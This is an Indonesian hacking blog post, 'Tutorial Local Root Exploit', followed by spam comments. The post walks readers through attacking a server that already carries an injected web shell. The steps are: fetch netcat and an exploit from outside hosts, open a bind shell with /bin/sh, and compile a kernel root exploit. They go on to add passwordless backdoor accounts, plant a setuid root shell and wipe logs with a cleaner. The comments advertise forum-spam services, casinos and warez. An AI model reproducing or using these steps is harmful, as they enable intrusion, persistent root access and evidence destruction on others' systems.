.:: ASSALAMUALAIKUM.:: AHLAN WASAHLAN DI BLOG INI. Ya! ANDA AKAN BELAJAR BARENG M Hasbi :. Belajar About Dunia Islam, Belajar About Dunia Pemikiran, Belajar About Dunia Tutorial, Belajar About Tips Dan Trick Aneh, Belajar Design Website, Belajar Dunia Shell-ing, Belajar Mencari Hikmah Dan Lain Sebagainya. Sooo ikuti terus perkembanganya. Anda juga bisa mendiskusikan permasalahan apapun tentang Agama Islam bersama saya. Ketik saja di ShoutBox.::. Akhirnya TERIMAKASIH ATAS KUNJUNGANNYA, SELAMAT MENIKMATI SEMOGA BERKENAN .::.

Monday, January 5, 2009

Tutorial Local Root Exploit

Posted by xshadow On June - 21 - 2008

netcatk lanjut aja.. nich tutor buat local root exploit :D

ok peralatan yang dibutuhkan (recruitment):

- shell yang dah di inject

- mig-log cleaner ==> hxxp://kvazar.ru/virtualhost/lg/files/miglc

- netcat ==> hxxp://h1.ripway.com/xshadow/wp/nc111nt.zip

- netcat ==> hxxp://kvazar.ru/virtualhost/lg/files/nc

- local root exploit ==> hxxp://www.linuxrootkit.cn/localroot/ atau hxxp://www.y0ume.net/localroot/



- sedikit otak

- ketelitian

ok lanjut…

1. masuk ke shell yag telah kalian inject…

entah kalian naruh dimana tuh shell…

http://target.com/shellinjectkalian.php

2. download file netcat buat dijalankan di target… jika kalian memakai shell c100 tinggal pilih.. pakai backconnection apa pakai backdorhost… jika memakai shell modifan kalian… terpaksa dunlut file netcat yang saya berikan…

wget http://kvazar.ru/virtualhost/lg/files/nc

jika sudah terdunlut ubah chmod-nya supaya bisa di eksekusi…

chmod +x nc

setelah diubah chmod-nya…

eksekusi file nc

./nc -l -p 8080 -e /bin/sh

jika netcat sudah terinstall… mari kita jalankan lewat pc kita :))

nc VictimIP Port (port yang kita pakai di contoh adalah 8080, dimana angka tersebut bisa diubah sesuai keinginan kita)

eg: nc 321.321.321 8080

ketika udah muncul tampilan backconnect dari jendela netcat kita…

kita lanjut ke yang berikut… download local exploitnya… jangan lupa.. samakan kernel target dengan exploitnya… (biar cocok) filenya berextensi *.c

aku contohkan memakai h00lishit.c

wget hxxp://www.linuxrootkit.cn/localroot/h00lyshit.c

setelah terdownload… compile file c tersebut…

gcc h00lyshit.c -o h00lyshit;chmod +x h00lyshit (dimana tanda ; adalah multi command… biasanya dipakek yang males2…)

nanti akan muncul file h00lyshit.. setelah itu eksekusi…

./h00lyshit

pada tahapan ini kamu harus sabar… biasanya lama bgt…

ketika sudah finish.. dan tidak ada pesan error apaun… coba jalankan command berikut…

whoami

atau

id

pasti akan muncul

uid=0(root) gid=0(root) groups=500(apache) atau apalah.. pokoknya root :P

sekarang sa’atnya mabuk… wkwkwkkww….

wait.. kalo dah mabuk… jangan lupa yang berikut ini…

kita add user… pastikan dahulu… dan kita buat backdoor

add user

/usr/sbin/useradd robber -g wheel -s /bin/bash -d /etc/.robber
passwd -d xshadowyangtampantiadaduanya

/usr/sbin/adduser robber -g root -d /home/robber -s /bin/bash
passwd -d xshadowyangtampantiadaduanya

/usr/sbin/adduser ftp -g root -d /home/robber -s /bin/bash
passwd -d xshadowyangtampantiadaduanya

/usr/sbin/useradd mailbin -c mail -d /var/spool/mail

/etc/init.d/httpd restart

ok

atau

#include
#include
#include
#include

int main( void )
{
setuid( 0 );
system( “/bin/bash” );

return 0;
}

root@xshadow /root# gcc -o .bkdr main.c
root@xshadow /root# chown root:root .bkdr
root@xshadow /root# chmod +s .bkdr

compile dan change permissionnya :D

kamu akan mendapatkan file .bkdr… dari situ terjadi penge-$PATH dan jika eksekusi memakai user lain maka

guest@xshadow /home/guest$ /usr/local/bin/.bkdr
root@xshadow /home/guest# whoami
root

dah kan.. balik lagi jadi root :P

sekarang saatnya bersih2 kotoran km.. :P

wget hxxp://kvazar.ru/virtualhost/lg/files/miglc;chmod +x miglc

jalankan pembersihnya

./miglc

sukses… heuheue…

selamat menikmati acara kamu berikutnya :P

oya.. kalo km pasang shell di site yang ada… kamu akan mendapati shell dengan jabatan root

5 comments:

Anonymous said...

[u][b]Xrumer[/b][/u]

[b]Xrumer SEO Professionals

As Xrumer experts, we from been using [url=http://www.xrumer-seo.com]Xrumer[/url] for a large immediately for the time being and know how to harness the colossal power of Xrumer and adapt it into a Cash machine.

We also purvey the cheapest prices on the market. Many competitors see fit order 2x or temperate 3x and a destiny of the opportunity 5x what we pervade you. But we feel in providing great help at a low affordable rate. The entire incidental of purchasing Xrumer blasts is because it is a cheaper surrogate to buying Xrumer. So we train to support that contemplating in mind and afford you with the cheapest standing possible.

Not just do we have the greatest prices but our turnaround heyday for your Xrumer posting is super fast. We intention take your posting done to come you know it.

We also outfit you with a full log of well-heeled posts on different forums. So that you can catch a glimpse of for yourself the power of Xrumer and how we get harnessed it to benefit your site.[/b]


[b]Search Engine Optimization

Using Xrumer you can expect to see thousands upon thousands of backlinks exchange for your site. Scads of the forums that your Install you intent be posted on have high PageRank. Having your association on these sites can deep down expropriate strengthen up some crown grade back links and uncommonly aid your Alexa Rating and Google PageRank rating through the roof.

This is making your site more and more popular. And with this inflate in regard as familiarly as PageRank you can keep in view to see your area definitely rank high in those Search Mechanism Results.
Transport

The amount of transportation that can be obtained nearby harnessing the power of Xrumer is enormous. You are publishing your site to tens of thousands of forums. With our higher packages you may equivalent be publishing your site to HUNDREDS of THOUSANDS of forums. Imagine 1 brief on a all the rage forum will almost always enter 1000 or so views, with say 100 of those people visiting your site. These days assume tens of thousands of posts on fashionable forums all getting 1000 views each. Your traffic ordain withdraw sometimes non-standard due to the roof.

These are all targeted visitors that are interested or curious nearly your site. Envision how assorted sales or leads you can achieve with this titanic loads of targeted visitors. You are truly stumbling upon a goldmine primed to be picked and profited from.

Keep in mind, Traffic is Money.
[/b]

TRAVERSE B RECOVER YOUR CHEAP ERUPTION TODAY:


http://www.xrumer-seo.com

Anonymous said...

[B]NZBsRus.com[/B]
Dismiss Sluggish Downloads Using NZB Files You Can Hastily Find Movies, PC Games, MP3 Singles, Software & Download Them @ Rapid Rates

[URL=http://www.nzbsrus.com][B]Usenet[/B][/URL]

Anonymous said...

Infatuation casinos? mull over this up to date [url=http://www.realcazinoz.com]casino[/url] helmsman and wing it compress online casino games like slots, blackjack, roulette, baccarat and more at www.realcazinoz.com .
you can also scrutinize our up to caitiff public schoolmate [url=http://freecasinogames2010.webs.com]casino[/url] in of the closet of snaffle guidance at http://freecasinogames2010.webs.com and subjugate corporeal severe spondulix !
another late-model [url=http://www.ttittancasino.com]casino spiele[/url] within an eyelash of is www.ttittancasino.com , because german gamblers, plan well-wishing online casino bonus.

Anonymous said...

in in soft this gratis [url=http://www.casinoapart.com]casino[/url] perk at the unsurpassed [url=http://www.casinoapart.com]online casino[/url] criterion with 10's of reborn [url=http://www.casinoapart.com]online casinos[/url]. actions [url=http://www.casinoapart.com/articles/play-roulette.html]roulette[/url], [url=http://www.casinoapart.com/articles/play-slots.html]slots[/url] and [url=http://www.casinoapart.com/articles/play-baccarat.html]baccarat[/url] at this [url=http://www.casinoapart.com/articles/no-deposit-casinos.html]no verge casino[/url] , www.casinoapart.com
the finest [url=http://de.casinoapart.com]casino[/url] to UK, german and all as a remains the world. so to the inform of [url=http://es.casinoapart.com]casino en linea[/url] lop us now.

Anonymous said...

Making money on the internet is easy in the hush-hush world of [URL=http://www.www.blackhatmoneymaker.com]blackhat download[/URL], You are far from alone if you don't know what blackhat is. Blackhat marketing uses alternative or not-so-known ways to generate an income online.

Template by : kendhin x-template.blogspot.com